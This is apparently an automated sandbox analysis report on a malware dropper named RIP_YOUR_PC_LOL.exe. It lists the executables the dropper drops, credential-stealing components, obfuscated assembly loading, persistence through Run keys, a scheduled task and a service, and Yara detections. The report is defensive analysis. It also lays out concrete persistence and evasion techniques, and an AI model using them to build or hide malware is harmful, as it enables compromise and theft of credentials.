                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exeMutant created: \Sessions\1\BaseNamedObjects\serhershesrhsfesrf
                    Source: Pluto Panel.exe.0.dr, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: Pluto Panel.exe.0.dr, Form1.csCryptographic APIs: 'CreateDecryptor'
                    Source: Opus.exe.4.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: Opus.exe.4.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
                    Source: Opus.exe.4.dr, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
                    Source: C:\Users\user\AppData\Roaming\test.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
                    Source: RIP_YOUR_PC_LOL.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                    Source: RIP_YOUR_PC_LOL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: RIP_YOUR_PC_LOL.exeStatic file information: File size 23633920 > 1048576
                    Source: RIP_YOUR_PC_LOL.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1689600
                    Source: RIP_YOUR_PC_LOL.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.388952115.00000000059C7000.00000004.00000800.00020000.00000000.sdmp, healastounding.exe, healastounding.exe, 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, 4.exe, 00000010.00000000.446983407.0000000001203000.00000002.00000001.01000000.0000000E.sdmp, 4.exe, 00000010.00000002.519990989.0000000001203000.00000002.00000001.01000000.0000000E.sdmp
                    Source: Binary string: D:\buildbot\slave1\desktop_screen\build\bin\active_desktop_launcher.pdb source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 22.exe, 0000000B.00000000.422804028.000000000042B000.00000008.00000001.01000000.0000000B.sdmp
                    Source: Binary string: C:\nutideyebibede\soy\gebetugito\meliyo zodoz.pdb source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 0fd7de5367376231a788872005d7ed4f.exe, 00000007.00000000.407475822.000000000041E000.00000002.00000001.01000000.00000008.sdmp, 0fd7de5367376231a788872005d7ed4f.exe, 00000007.00000002.465903756.000000000041E000.00000002.00000001.01000000.00000008.sdmp, 0fd7de5367376231a788872005d7ed4f.exe, 0000000F.00000000.436842136.000000000041E000.00000002.00000001.01000000.00000008.sdmp
                    Source: Binary string: ]C:\nutideyebibede\soy\gebetugito\meliyo zodoz.pdb source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 0fd7de5367376231a788872005d7ed4f.exe, 00000007.00000000.407475822.000000000041E000.00000002.00000001.01000000.00000008.sdmp, 0fd7de5367376231a788872005d7ed4f.exe, 00000007.00000002.465903756.000000000041E000.00000002.00000001.01000000.00000008.sdmp, 0fd7de5367376231a788872005d7ed4f.exe, 0000000F.00000000.436842136.000000000041E000.00000002.00000001.01000000.00000008.sdmp
                    Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Pluto Panel.exe, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, Pluto Panel.exe, 00000005.00000002.710948269.0000000003B3A000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000002.712472379.0000000007710000.00000004.00000001.00040000.00000000.sdmp, Pluto Panel.exe, 00000005.00000002.705753147.0000000003691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000002.706244077.0000000003705000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, Pluto Panel.exe, 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp
                    Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, Pluto Panel.exe, 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp

                    Data Obfuscation

                    Source: RIP_YOUR_PC_LOL.exe, Program.cs.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: healastounding.exe.0.dr, Program.cs .Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: Pluto Panel.exe.0.dr, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: Pluto Panel.exe.0.dr, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: Pluto Panel.exe.0.dr, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: Pluto Panel.exe.0.dr, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: test.exe.4.dr, Client/Handle_Packet/Packet.cs .Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: gay.exe.4.dr, OK.cs .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: Opus.exe.4.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: Opus.exe.4.dr, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 4.0.healastounding.exe.900000.4.unpack, Program.cs .Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 4.2.healastounding.exe.900000.0.unpack, Program.cs .Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 4.0.healastounding.exe.900000.0.unpack, Program.cs .Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 4.0.healastounding.exe.900000.12.unpack, Program.cs .Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 4.0.healastounding.exe.900000.8.unpack, Program.cs .Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.Pluto Panel.exe.f10000.8.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.Pluto Panel.exe.f10000.8.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.Pluto Panel.exe.f10000.8.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.Pluto Panel.exe.f10000.8.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.2.Pluto Panel.exe.f10000.0.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.2.Pluto Panel.exe.f10000.0.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.2.Pluto Panel.exe.f10000.0.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.2.Pluto Panel.exe.f10000.0.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.Pluto Panel.exe.f10000.4.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.Pluto Panel.exe.f10000.4.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.Pluto Panel.exe.f10000.4.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.Pluto Panel.exe.f10000.4.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.Pluto Panel.exe.f10000.12.unpack, Form1.cs .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.Pluto Panel.exe.f10000.12.unpack, Form1.cs .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.Pluto Panel.exe.f10000.12.unpack, Form1.cs .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 5.0.Pluto Panel.exe.f10000.12.unpack, Form1.cs .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe Code function: 5_2_00F80712 push eax; ret 5_2_00F80726
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe Code function: 5_2_00F80712 push eax; ret 5_2_00F8074E
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe Code function: 5_2_00F5BA9D push eax; ret 5_2_00F5BAB1
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe Code function: 5_2_00F5BA9D push eax; ret 5_2_00F5BAD9
                    Source: C:\Users\user\AppData\Roaming\test.exe Code function: 6_2_00DA2F81 push eax; ret 6_2_00DA2F95
                    Source: C:\Users\user\AppData\Roaming\test.exe Code function: 6_2_00DA7201 push es; iretd 6_2_00DA7202
                    Source: C:\Users\user\AppData\Roaming\test.exe Code function: 6_2_00DA4122 push eax; ret 6_2_00DA412C
                    Source: C:\Users\user\AppData\Roaming\test.exe Code function: 6_2_00DA2A66 push 0000003Eh; retn 0000h 6_2_00DA2DC0
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe Code function: 7_2_00416480 LoadLibraryA,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,7_2_00416480
                    Source: a.exe.4.dr Static PE information: 0x85C84FCD [Thu Feb 14 23:29:17 2041 UTC]
                    Source: 4.exe.4.dr Static PE information: section name: .didat
                    Source: a.exe.4.dr Static PE information: section name:
                    Source: a.exe.4.dr Static PE information: section name:
                    Source: a.exe.4.dr Static PE information: section name:
                    Source: a.exe.4.dr Static PE information: section name:
                    Source: a.exe.4.dr Static PE information: section name: .uxD5Xzb
                    Source: a.exe.4.dr Static PE information: section name: .adata
                    Source: Opus.exe.4.dr Static PE information: real checksum: 0x0 should be: 0x361f1
                    Source: healastounding.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x38fcef
                    Source: test.exe.4.dr Static PE information: real checksum: 0x0 should be: 0x12c3f
                    Source: aaa.exe.4.dr Static PE information: real checksum: 0x0 should be: 0x2b8ea
                    Source: 4.exe.4.dr Static PE information: real checksum: 0x0 should be: 0x8ea8d
                    Source: a.exe.4.dr Static PE information: real checksum: 0x36412d should be: 0x179cea
                    Source: Pluto Panel.exe.0.dr Static PE information: real checksum: 0x0 should be: 0xe3f4e
                    Source: gay.exe.4.dr Static PE information: real checksum: 0x0 should be: 0x17231
                    Source: 0fd7de5367376231a788872005d7ed4f.exe.0.dr Static PE information: real checksum: 0x8cb64 should be: 0x8bd88
                    Source: 22.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x2047ff
                    Source: C:\Users\user\AppData\Roaming\4.exe File created: C:\Users\user\AppData\Roaming\__tmp_rar_sfx_access_check_21517828
                    Source: initial sample Static PE information: section name: .text entropy: 7.23229435769
                    Source: initial sample Static PE information: section name: .text entropy: 7.79704182216
                    Source: initial sample Static PE information: section name: entropy: 7.99417258092
                    Source: initial sample Static PE information: section name: entropy: 7.59206430894
                    Source: initial sample Static PE information: section name: .uxD5Xzb entropy: 7.91678806903
                    Source: Opus.exe.4.dr, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
                    Source: Opus.exe.4.dr, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe File created: C:\Users\user\AppData\Roaming\Pluto Panel.exe
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe File created: C:\Users\user\AppData\Roaming\Opus.exe
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe File created: C:\Users\user\AppData\Roaming\aaa.exe
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe File created: C:\Users\user\AppData\Roaming\a.exe
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe File created: C:\Users\user\AppData\Roaming\test.exe
                    Source: C:\Users\user\AppData\Roaming\gay.exe File created: C:\Users\user\AppData\Roaming\mediaget.exe
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe File created: C:\Users\user\AppData\Roaming\gay.exe
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe File created: C:\Users\user\AppData\Roaming\healastounding.exe
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe File created: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe File created: C:\Users\user\AppData\Roaming\___11.19.exe
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe File created: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe File created: C:\Users\user\AppData\Roaming\4.exe
                    Source: C:\Users\user\AppData\Roaming\22.exe File created: C:\Windows\Cursors\WUDFhosts.exe
                    Source: C:\Users\user\AppData\Roaming\22.exe File created: C:\Windows\Help\Winlogon.exe
                    Source: C:\Users\user\AppData\Roaming\mediaget.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe File created: C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe File created: C:\Users\user\AppData\Local\Temp\Dcvxaamev.exe
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe File created: C:\Users\user\AppData\Roaming\22.exe
                    Source: C:\Users\user\AppData\Roaming\Opus.exe File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                    Source: C:\Users\user\AppData\Roaming\22.exe File created: C:\Windows\Help\active_desktop_render.dll
                    Source: C:\Users\user\AppData\Roaming\4.exe File created: C:\Users\user\AppData\Roaming\3.exe

                    Boot Survival

                    Source: Yara match File source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara match File source: 0.0.RIP_YOUR_PC_LOL.exe.206ac1d.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.3.RIP_YOUR_PC_LOL.exe.5a556c1.5.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 6.2.test.exe.da0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.RIP_YOUR_PC_LOL.exe.1f6c52e.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.0.RIP_YOUR_PC_LOL.exe.1f6c52e.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.2.healastounding.exe.3479694.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.2.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 6.0.test.exe.da0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.95312e.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.0.RIP_YOUR_PC_LOL.exe.1fdd5e1.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.3.RIP_YOUR_PC_LOL.exe.5a556c1.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.2.healastounding.exe.3474284.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.935129.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.2.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.95312e.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 6.0.test.exe.da0000.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.RIP_YOUR_PC_LOL.exe.206ac1d.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.RIP_YOUR_PC_LOL.exe.1fdd5e1.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 6.0.test.exe.da0000.3.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.935129.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.RIP_YOUR_PC_LOL.exe.206ac1d.13.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.0.RIP_YOUR_PC_LOL.exe.206ac1d.13.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.3.RIP_YOUR_PC_LOL.exe.59c8085.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.2.healastounding.exe.3479694.5.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 6.0.test.exe.da0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.95312e.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.935129.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.3.RIP_YOUR_PC_LOL.exe.596a627.9.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000006.00000000.397644420.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000003.388952115.00000000059C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match File source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match File source: 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.693319449.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match File source: 00000006.00000000.405813841.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match File source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match File source: 00000006.00000000.394727625.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match File source: 00000006.00000000.399704980.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match File source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match File source: 00000006.00000002.701012196.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match File source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match File source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: RIP_YOUR_PC_LOL.exe PID: 6880, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: healastounding.exe PID: 3572, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: test.exe PID: 6236, type: MEMORYSTR
                    Source: Yara match File source: C:\Users\user\AppData\Roaming\test.exe, type: DROPPED
                    Source: Yara match File source: C:\Users\user\AppData\Roaming\healastounding.exe, type: DROPPED
                    Source: C:\Users\user\AppData\Roaming\mediaget.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe
                    Source: C:\Users\user\AppData\Roaming\mediaget.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run a797c6ca3f5e7aff8fa1149c47fe9466
                    Source: C:\Users\user\AppData\Roaming\Opus.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp4896.tmp
                    Source: C:\Users\user\AppData\Roaming\22.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\KuGouMusic
                    Source: C:\Users\user\AppData\Roaming\22.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\KuGouMusic

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Users\user\AppData\Roaming\Opus.exe File opened: C:\Users\user\AppData\Roaming\Opus.exe:Zone.Identifier read attributes | delete
                    Source: C:\Users\user\AppData\Roaming\aaa.exe File opened: C:\Users\user\AppData\Roaming\aaa.exe:Zone.Identifier read attributes | delete
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\test.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
